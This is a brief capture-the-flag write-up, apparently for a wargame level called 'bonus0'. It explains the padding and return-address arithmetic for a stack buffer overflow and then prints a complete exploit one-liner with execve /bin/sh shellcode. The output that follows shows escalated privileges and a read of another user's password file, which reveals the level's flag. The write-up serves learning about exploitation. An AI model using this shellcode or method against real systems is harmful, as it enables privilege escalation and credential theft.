
the buf wariable is located at 0xbfffe670 as we can see in gdb
now we inject a shellcode after a certain padding greater than 61
61 = 20 of the first buffer which isn't terminated and attached at the second iteration on the buffer (size 20) and another second buffer + the space between = 20 + 20 + 1 + 20
then we can proceed with 69 for example where we can get 0xbfffe670 + 69 = 0xbfffe6b5 -> \xb5\xe6\xff\xbf
this will be padded into the second input which has an offset of nine

> (python -c 'print("A"*69 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\x83\xe4\xf0\xcd\x80")'; python -c 'print("B"*9 + "\xb5\xe6\xff\xbf" + "C"*7)'; cat) | ./bonus0
 -
 -
AAAAAAAAAAAAAAAAAAAABBBBBBBBBCCCCCCC BBBBBBBBBCCCCCCC
id
uid=2010(bonus0) gid=2010(bonus0) euid=2011(bonus1) egid=100(users) groups=2011(bonus1),100(users),2010(bonus0)
cat /home/user/bonus1/.pass
cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9
